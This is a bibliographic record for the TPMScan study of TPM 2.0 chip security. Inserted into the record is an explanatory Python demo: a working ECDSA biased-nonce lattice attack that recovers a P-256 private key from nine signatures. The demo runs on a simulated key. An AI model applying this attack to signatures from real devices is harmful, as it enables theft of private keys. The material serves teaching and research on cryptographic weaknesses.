TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips

Bibliographic Details
Main Authors: Petr Svenda, Antonin Dufka, Milan Broz, Roman Lacko, Tomas Jaros, Daniel Zatovic, Josef Pospisil
Format: Article
Language: English
Published: Ruhr-Universität Bochum 2024-03-01
Series: Transactions on Cryptographic Hardware and Embedded Systems
Subjects: TPM, RSA, ECDSA, ECSCHNORR, ECDAA, ECC key recovery
Online Access:https://tches.iacr.org/index.php/TCHES/article/view/11444
_version_ 1827318184420573184
author Petr Svenda
Antonin Dufka
Milan Broz
Roman Lacko
Tomas Jaros
Daniel Zatovic
Josef Pospisil
author_sort Petr Svenda
collection DOAJ
description The Trusted Platform Module (TPM) is a widely deployed computer component that provides increased protection of key material during cryptographic operations, secure storage, and support for a secure boot with a remotely attestable state of the target machine. A systematic study of the TPM ecosystem, its cryptographic properties, and the orderliness of vulnerability mitigation is missing despite its pervasive deployment – likely due to the black-box nature of the implementations. We collected metadata, RSA and ECC cryptographic keys, and performance characteristics from 78 different TPM versions manufactured by 6 vendors, including recent Pluton-based iTPMs, to systematically analyze TPM implementations. Surprisingly, a high rate of changes with a detectable impact on generated secrets, the timing of cryptographic operations, and frequent off-chip generation of Endorsement Keys were observed. Our analysis of public artifacts for TPM-related products certified under Common Criteria (CC) and FIPS 140 showed relatively high popularity of TPMs but without explanation for these changes in cryptographic implementations. Despite TPMs being commonly certified to CC EAL4+, serious vulnerabilities like ROCA or TPM-Fail were discovered in the past. We found a range of additional unreported nonce leakages in ECDSA, ECSCHNORR, and ECDAA algorithms in dTPMs and fTPMs of three vendors. The most serious discovered leakage allows extraction of the private key of certain Intel fTPM versions using only nine signatures with no need for any side-channel information, making the vulnerability retrospectively exploitable despite a subsequent firmware update. Unreported timing leakages were discovered in the implementations of ECC algorithms on multiple Nuvoton TPMs, and other previously reported leakages were confirmed. The analysis also unveiled incompleteness of vulnerability reporting and subsequent mitigation with missing clear information about the affected versions and inconsistent fixes.
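The nine-signature key extraction mentioned in the description is an instance of the hidden-number problem for ECDSA: when every nonce k_i is known to lie in a range much smaller than the group order n, the relations k_i = s_i^-1 (h_i + r_i d) mod n turn into a lattice problem that LLL solves from the signatures and the public key alone, with no side-channel trace. The Python example below is added here and is not code from the TPMScan paper or its tooling. The description does not say what the affected Intel fTPM nonces looked like, so the bias is an assumption chosen for illustration: each nonce has its top 40 bits zero, which is more than enough for nine NIST P-256 signatures (the number of signatures needed shrinks as the bits leaked per signature grow; the rule of thumb is that the leaked bits must add up to more than log2 n plus a margin). The curve constants are the standard P-256 values; the exact-integer LLL is Cohen's Algorithm 2.6.7 written out so that no lattice library is required; the function names, seed and message strings are the example's own.

```python
import hashlib
import random

# NIST P-256 (secp256r1) parameters; TPM 2.0 ECDSA keys are commonly on this curve.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

def ec_add(p1, p2):  # affine addition on y^2 = x^3 - 3x + b over GF(P); None = infinity
    if p1 is None or p2 is None:
        return p1 if p2 is None else p2
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    lam = ((3 * x1 * x1 - 3) * pow(2 * y1, -1, P) if p1 == p2
           else (y2 - y1) * pow(x2 - x1, -1, P)) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def ec_mul(k, pt):  # double-and-add (not constant time; offline demo only)
    acc = None
    while k:
        acc = ec_add(acc, pt) if k & 1 else acc
        pt, k = ec_add(pt, pt), k >> 1
    return acc

def ecdsa_sign(d, h, k):  # textbook ECDSA: r = (kG).x mod n, s = k^-1 (h + r d) mod n
    r = ec_mul(k, G)[0] % N
    return r, pow(k, -1, N) * (h + r * d) % N

def lll_reduce(basis):
    """Exact integer LLL (Cohen, Algorithm 2.6.7, delta = 0.99) on integer row vectors."""
    b, n = [list(v) for v in basis], len(basis)
    d = [1] + [0] * n                    # d[i]: Gram determinant of the first i rows
    lam = [[0] * n for _ in range(n)]    # lam[i][j] = d[j+1] * mu_ij, always an integer
    dot = lambda x, y: sum(p * q for p, q in zip(x, y))
    def red(k, l):                       # size-reduce b[k] against b[l]
        if 2 * abs(lam[k][l]) > d[l + 1]:
            q = (2 * lam[k][l] + d[l + 1]) // (2 * d[l + 1])
            b[k] = [x - q * y for x, y in zip(b[k], b[l])]
            lam[k][l] -= q * d[l + 1]
            for i in range(l):
                lam[k][i] -= q * lam[l][i]
    def swap(k, kmax):                   # exchange b[k-1], b[k]; fix up d and lam
        b[k], b[k - 1] = b[k - 1], b[k]
        for j in range(k - 1):
            lam[k][j], lam[k - 1][j] = lam[k - 1][j], lam[k][j]
        mu, bb = lam[k][k - 1], (d[k - 1] * d[k + 1] + lam[k][k - 1] ** 2) // d[k]
        for i in range(k + 1, kmax + 1):
            t = lam[i][k]
            lam[i][k] = (d[k + 1] * lam[i][k - 1] - mu * t) // d[k]
            lam[i][k - 1] = (bb * t + mu * lam[i][k]) // d[k + 1]
        d[k] = bb
    d[1], k, kmax = dot(b[0], b[0]), 1, 0
    while k < n:
        if k > kmax:                     # incremental Gram-Schmidt for a newly reached row
            kmax = k
            for j in range(k + 1):
                u = dot(b[k], b[j])
                for i in range(j):
                    u = (d[i + 1] * u - lam[k][i] * lam[j][i]) // d[i]
                if j < k:
                    lam[k][j] = u
            d[k + 1] = u                 # the j == k pass yields the new Gram determinant
        red(k, k - 1)
        if 100 * d[k + 1] * d[k - 1] < 99 * d[k] ** 2 - 100 * lam[k][k - 1] ** 2:
            swap(k, kmax)                # Lovasz condition failed: swap and step back
            k = max(1, k - 1)
        else:
            for l in range(k - 2, -1, -1):
                red(k, l)
            k += 1
    return b

def recover_key_from_biased_nonces(sigs, hashes, pub, leak_bits):
    """HNP attack: k_i = t_i d + a_i (mod n), each k_i < K; d eliminated via k_1, LLL finds (k_1..k_m, K)."""
    m, K = len(sigs), 1 << (256 - leak_bits)
    t = [r * pow(s, -1, N) % N for r, s in sigs]
    a = [h * pow(s, -1, N) % N for (r, s), h in zip(sigs, hashes)]
    inv_t1 = pow(t[0], -1, N)
    tp = [ti * inv_t1 % N for ti in t]                  # k_i = tp_i * k_1 + ap_i (mod n)
    ap = [(ai - tpi * a[0]) % N for ai, tpi in zip(a, tp)]
    basis = [[N if c == i else 0 for c in range(m + 1)] for i in range(1, m)]
    basis += [[1] + tp[1:] + [0], [0] + ap[1:] + [K]]
    for row in lll_reduce(basis):
        if abs(row[-1]) == K:                           # candidate (+-k_1, ..., +-K)
            cand = ((row[0] if row[-1] == K else -row[0]) - a[0]) * inv_t1 % N
            if ec_mul(cand, G) == pub:                  # confirm against the public key
                return cand
    return None

def simulate_and_attack(num_sigs=9, leak_bits=40, seed=7):
    """Constructed scenario (assumed bias: top leak_bits of every nonce are zero); returns (true d, recovered d)."""
    rng = random.Random(seed)                           # deterministic, reproducible run
    d = rng.randrange(1, N)
    hashes = [int.from_bytes(hashlib.sha256(b"msg %d" % i).digest(), "big") % N for i in range(num_sigs)]
    sigs = [ecdsa_sign(d, h, rng.randrange(1, 1 << (256 - leak_bits))) for h in hashes]
    return d, recover_key_from_biased_nonces(sigs, hashes, ec_mul(d, G), leak_bits)
```

`simulate_and_attack()` returns the generated private key together with the key recovered from the nine signatures and the public key; with fewer signatures than the leak supports (for example `num_sigs=4` at 40 leaked bits) the lattice no longer contains the target vector and the attack returns `None`. The same relation k = s^-1 (h + r d) mod n, evaluated with a key that is known because it was imported into the device under test, recovers the nonce of every signature, which is how a bias of the kind assumed here is measured on a black-box implementation before any attack is attempted.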
first_indexed 2024-04-24T23:53:38Z
format Article
id doaj.art-07ce4cb0415c411d843401c0929d68d2
institution Directory Open Access Journal
issn 2569-2925
language English
last_indexed 2024-04-24T23:53:38Z
publishDate 2024-03-01
publisher Ruhr-Universität Bochum
record_format Article
series Transactions on Cryptographic Hardware and Embedded Systems
spelling doaj.art-07ce4cb0415c411d843401c0929d68d2
  indexed 2024-03-14T16:24:44Z
  language eng
  publisher Ruhr-Universität Bochum
  journal Transactions on Cryptographic Hardware and Embedded Systems, ISSN 2569-2925
  published 2024-03-01, volume 2024, issue 2, pages 714-734
  doi 10.46586/tches.v2024.i2.714-734
  title TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips
  authors (affiliation index as given in the record): Petr Svenda (0), Antonin Dufka (1), Milan Broz (2), Roman Lacko (3), Tomas Jaros (4), Daniel Zatovic (5), Josef Pospisil (6)
  affiliations: 0-4 Masaryk University, Brno, Czech Republic; 5 Red Hat, Brno-Medlánky, Czech Republic; 6 National Cyber and Information Security Agency, Brno, Czech Republic
  url https://tches.iacr.org/index.php/TCHES/article/view/11444
  keywords TPM; RSA; ECDSA; ECSCHNORR; ECDAA; ECC key recovery
title TPMScan: A wide-scale study of security-relevant properties of TPM 2.0 chips
topic TPM
RSA
ECDSA
ECSCHNORR
ECDAA
ECC key recovery
url https://tches.iacr.org/index.php/TCHES/article/view/11444